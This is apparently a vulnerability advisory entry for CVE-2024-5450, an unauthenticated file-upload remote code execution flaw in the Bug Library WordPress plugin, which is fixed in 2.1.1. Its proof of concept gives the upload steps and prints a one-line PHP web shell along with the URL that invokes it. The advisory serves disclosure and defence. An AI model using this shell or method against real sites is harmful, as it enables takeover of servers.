Bug Library < 2.1.1 – Unauthenticated RCE | CVE 2024-5450 | Plugin Vulnerabilities

Description

The plugin does not check the file type on user-submitted bug reports, allowing an unauthenticated user to upload PHP files

Proof of Concept

1. Configure the plugin to allow file attachments from "Bugs > General Options"
2. Add `[bug-library]` shortcode to a post
3. As an unauthenticated user, visit the page where the shortcode has been added
4. Upload a `.php` file (example below)
5. When directory listing is allowed, you can see the uploaded files
6. Confirm the shell at: https://wps-test.ddev.site/wp-content/uploads/bug-library/bugimage-671.php?cmd=ls%20-l

File used in test:

```
<?php echo system($_GET['cmd']); ?>
```

Note: the filename will change based on the test site's configuration.

Affects Plugins

Fixed in 2.1.1

References

CVE

Classification

Type

RCE

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

d91217bc-9f8f-4971-885e-89edc45b2a4d

Timeline

Publicly Published

2024-06-22 (about 1 year ago)

Added

2024-06-22 (about 1 year ago)

Last Updated

2024-06-22 (about 1 year ago)

Other

Published

Title

Published

2014-08-01

Title

MailPoet Newsletters 2.6.6 - Theme File Upload H&ling Remote Code Execution

Published

2024-04-17

Title

HUSKY – Products Filter for WooCommerce (formerly WOOF) < 1.3.5.3 - Subscriber+ Remote Code Execution

Published

2020-09-22

Title

XCloner Backup and Restore 4.2.1 - 4.2.12 - Unprotected AJAX Action

Published

2014-08-01

Title

DZS Video Gallery - upload.php File Upload Remote Code Execution

Published

2024-09-13

Title

FOX – Currency Switcher Professional for WooCommerce < 1.4.2.2 - Unauthenticated Arbitrary Shortcode Execution